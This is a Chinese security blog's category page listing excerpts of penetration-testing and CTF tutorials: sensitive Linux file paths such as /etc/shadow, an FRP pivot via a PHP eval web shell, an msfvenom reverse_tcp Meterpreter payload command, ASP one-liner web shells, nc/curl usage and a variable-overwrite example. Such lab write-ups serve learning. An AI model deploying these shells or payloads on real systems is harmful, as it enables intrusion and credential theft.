分类: 渗透

14 篇文章

【原创】常用服务器绝对路径
[huayang] /etc/passwd 是linux系统保存用户信息及其工作目录的文件 /etc/shadow 是linux系统保存用户信息及(可能存在)密码(hash)的文件 /etc/apache2 是apache的配置文件,可以看见web的目录和服务端口等信息,常用于确认路径 /etc/nginx nginx配置文件,,可以看见web的目录和服务端口等信息,常用于确认路径 /etc/ho…
thumbnail
【原创】内网穿透案例
[huayang] 案列一(Frp内网渗透) 大概图列 网上随便找的,路线是这个样子 这里选用ctfshow的一道命令执行题 由Frp实现内网访问及扫描 1.传入一句话,上线蚁剑 http://b85fdf24-b98e-4810-9e76-a038a8987630.challenge.ctf.show:8080/?c=`echo '<?php eval(\$_POST[1]);?&…
thumbnail
【原创】MSF简单提权开启远程桌面并连接
攻击机: kali:172.16.181.8 win sever2012 :172.16.181.4 目标机: win7:172.16.181.9 建立连接 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.181.8 LPORT=4444 -f exe -o 123.exe 把马放入目标机,因为我的虚拟机有点小问题,不能用samba…
【转载】各种小马小结
原文地址:https://blog.csdn.net/qq_35078631/article/details/77743794 最近总是碰到小马的题目,心想还是小小收集一下各种的小马,碰到新的再更新ASP <%eval request("sb")%> <%execute request("sb")%> <%execute(request("sb"))%> <…
thumbnail
【原创】浅谈nc与curl
[huayang] NC nc被誉为网络安全界的瑞士军刀,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据 实验环境 操作系统IP地址kali 2021172.16.231.128macOS 172.16.231.1 简单的交互 -l:使用监听模式,监控传入的信息 macOS开启监听 kali链接2333 输入的任何信息都会被对方看见 公网也是可以的 上传文件到远程 测试的时候…
【原创 精华】渗透测试-信息收集
一切需要用到的软件均已备份到百度云和阿里云 没有链接的文件请在本地渗透工具文件夹或是kali里查看 能用fofa的尽量用 包括查ip,端口扫描,子域名,蜜罐 子域名收集 工具 子域名挖掘机(本地文件有) 通过爆破的模式 https://phpinfo.me/domain/ 搜索引擎语法 谷歌百度通用 site:*baidu.com 证书查询 https://crt.sh 搜索百度四级域名 %.%.…
【原创 精华】详解变量覆盖(待更)
[huayang] 变量覆盖 extract() 从数组中将变量导入到当前的符号表 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim($flag); if($shiyan==$content) { echo'ctf{xxx}'; } else { echo'Oh.no'; } } ?> $$ 可变…